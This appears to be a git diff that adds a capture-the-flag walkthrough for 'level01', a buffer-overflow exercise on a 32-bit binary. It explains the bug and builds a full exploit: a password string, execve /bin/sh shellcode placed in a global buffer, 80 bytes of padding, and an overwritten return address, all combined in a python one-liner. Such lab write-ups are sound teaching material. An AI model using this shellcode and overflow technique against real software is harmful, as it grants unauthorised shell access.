level00: done

level01: done

level01/walkthrough

@@ -0,0 +1,19 @@
+# Level01
+
+Using ghidra, we can decompile the code and see that it fills a global buffer of 100 bytes using `fgets()`.
+This buffer will then be passed to a function returning false if it equals to `"dat_wil"`, allowing us to go through the second part of the code.
+Now comes the real part. There is a second `fgets()` on another buffer, a local buffer this time. The difference here is that the buffer is non-secure (the first one smh never crashes with the overflow) and we can modify `eip` register to whatever value we want.
+To exploit this vulnerability, we are going to use both buffers.
+First, we need to write `"dat_wil"` in the first `fgets()`, so that we access to the rest of the code. Second, we're going to write a shell code injection in that same buffer, after `"dat_wil"`. Finally, we will overflow the second buffer (with the call to `fgets()`) and write the address of the first buffer (+7 bytes, for the string at the beginning of the first buffer) to`eip`.
+To get `eip`'s address, we use (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] that will calculate the offset between our buffer and `eip` (since it causes a segfault when overwriting it with random values).
+Let's build our exploit in 4 parts:
+- `"dat_wil"` => the required string to get the 2nd call to `fgets()`
+- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the shell code injection
+Print a `"\n"` to exit the first `fgets()`
+- `"A"*80` => fill the buffer until `eip`
+- `"\x47\xa0\x04\x08"` => the address of our shell code injection (addr of `a_user_name` + 7)
+Print a `"\n"` to exit the second `fgets()`
+
+Here is the full exploit:
+`(python -c 'print "dat_wil" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "\n" + "A"*80 + "\x47\xa0\x04\x08" + "\n"'; cat) | ./level01`
+